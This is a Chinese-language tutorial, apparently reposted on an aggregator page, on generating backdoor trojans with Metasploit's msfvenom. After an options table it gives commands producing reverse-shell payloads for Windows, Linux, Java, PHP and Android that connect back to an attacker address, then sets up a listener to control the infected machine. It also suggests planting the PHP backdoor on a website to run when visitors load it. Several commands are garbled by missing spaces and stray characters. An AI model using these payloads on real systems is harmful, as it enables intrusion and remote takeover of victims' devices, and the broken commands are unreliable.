msf生成linux shellcode,MSF-Shellcode生成和使用
1使用環境
Kali 2.0
msfvenom
2Msfvenom參數說明
msfvenom �Ch ???查看幫助
說明:
Options:
-p, --payload??? ??????? 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定
-l, --list???? ??[module_type]?? 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
-n, --nopsled??? ???????? 為payload預先指定一個NOP滑動長度
-f, --format???? ???????? 指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
-e, --encoder??? [encoder]?????? 指定需要使用的encoder(編碼器)
-a, --arch?????? ?? 指定payload的目標架構
--platform?? ?????? 指定payload的目標平臺
-s, --space????? ???????? 設定有效攻擊荷載的最大長度
-b, --bad-chars? ?????????? 設定規避字符集,比如: '\x00\xff'
-i, --iterations ???????? ?指定payload的編碼次數
-c, --add-code?? ?????????? 指定一個附加的win32 shellcode文件
-x, --template?? ?????????? 指定一個自定義的可執行文件作為模板
-k, --keep?????????????????????? ?保護模板程序的動作,注入的payload作為一個新的進程運行
--payload-options??????????? 列舉payload的標準選項
-o, --out?? ?????????????? 保存payload
-v, --var-name ??????????? ?指定一個自定義的變量,以確定輸出格式
--shellest?????????????????? 最小化生成payload
-h, --help?????????????????????? ?查看幫助選項
--help-formats?????????????? 查看msf支持的輸出格式列表
2.1命常用幫助命令
msfvenom --help-formats???? 查看有哪些格式輸出
msfvenom -l encoders?????? 查看有哪些編碼方式
3Metasploit生成多種后門
Metasploit可以生成各種格式的后門,有php、exe(windows下后門)、linux環境下后門,java后門、androiw后門等等。
可以生成asp、aspx、php、jsp、war、exe等多種類型
現在已經沒有msfpayload的命令了,換成msfvenom了。里面集成了msfpayload和msfencode
3.1生成window下后門程序
使用以下模塊生成windows系統下后門程序。
windows/meterpreter/reverse_tcp
生成木馬程序時如果可以指定也可以不指定--arch x86 --platform windows,不指定則會報錯提示,不用理會,-p后寫指定的payload,-f后指定文件格式。
msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe
或者指定參數如下:
使用生成木馬命令:
msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe
被中木馬的機器IP地址是192.168.1.123
把在kali的根目錄生產的木馬程序aaa.exe文件拷貝到被攻擊的機器上面去192.168.1.123上。
======================================================
設置監聽:
使用監聽模塊:use exploit/multi/handler
使用payload
執行監聽
=================================================
在被攻擊的機器上面雙機運行aaa.exe木馬,此時在kali上面觀看結果如下:
說明192.168.1.123已經被中木馬了,可以控制此機器了。
通過輸入shell來進入控制臺控制機器。
查看機器的ip地址是否是192.168.1.123
3.2生成linux下后門程序
使用以下模塊生成linux后門程序,操作方法跟windows后門使用一樣。
linux/x86/shell_reverse_tcp
與windows系統唯一的區別是在linux下生成的木馬需要給這個程序可執行的權限,通過使用以下命令chmod:
Chmod +x 程序名
在linux下執行木馬程序命令:
./程序名
3.3生成Java后門程序
Java程序在windows下和在linux下都可以生效執行的
使用以下模塊生成后門程序:
java/meterpreter/reverse_tcp
生成木馬命令:
msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar
3.4生成PHP后門程序
使用模塊:
php/meterpreter/reverse_tcp
生成木馬命令:
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php
把生成的木馬php文件放到網站上面,當別人訪問的時候就會執行。
3.5生成Android后門程序
使用模塊:
android/meterpreter/reverse_tcp
生成木馬命令:
msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk
總結
以上是生活随笔為你收集整理的msf生成linux shellcode,MSF-Shellcode生成和使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux shell find dep
- 下一篇: arm linux移植jvm,JVM的A